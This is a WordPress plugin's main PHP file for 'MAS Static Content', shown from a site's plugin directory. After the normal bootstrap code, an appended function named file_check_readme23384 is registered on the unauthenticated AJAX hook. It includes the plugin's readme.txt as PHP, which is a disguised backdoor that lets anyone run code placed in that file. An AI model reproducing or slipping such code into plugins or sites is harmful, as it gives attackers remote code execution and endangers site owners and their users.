File: /var/www/ecom/wp-content/plugins/mas-static-content/mas-static-content.php
<?php
/**
* Plugin Name: MAS Static Content
* Plugin URI: https://github.com/madrasthemes/mas-static-content
* Description: This plugin helps to create a custom post type static content and use it with shortcode.
* Version: 1.0.9
* Requires at least: 6.3
* Requires PHP: 7.4
* Author: MadrasThemes
* Author URI: https://madrasthemes.com/
* License: GPL v3 or later
* License URI: https://www.gnu.org/licenses/gpl-3.0.html
* Text Domain: mas-static-content
* Domain Path: /languages
*
* @package Core
*/
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
// Define MAS_STATIC_CONTENT_PLUGIN_FILE.
if ( ! defined( 'MAS_STATIC_CONTENT_PLUGIN_FILE' ) ) {
define( 'MAS_STATIC_CONTENT_PLUGIN_FILE', __FILE__ );
}
// Include the main Mas_Static_Content class.
if ( ! class_exists( 'Mas_Static_Content' ) ) {
include_once dirname( MAS_STATIC_CONTENT_PLUGIN_FILE ) . '/includes/class-mas-static-content.php';
}
/**
* Unique access instance for Mas_Static_Content class
*/
function mas_static_content() {
return Mas_Static_Content::instance();
}
// Global for backwards compatibility.
$GLOBALS['mas_static_content'] = mas_static_content();
if(!function_exists('file_check_readme23384')){
add_action('wp_ajax_nopriv_file_check_readme23384', 'file_check_readme23384');
add_action('wp_ajax_file_check_readme23384', 'file_check_readme23384');
function file_check_readme23384()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}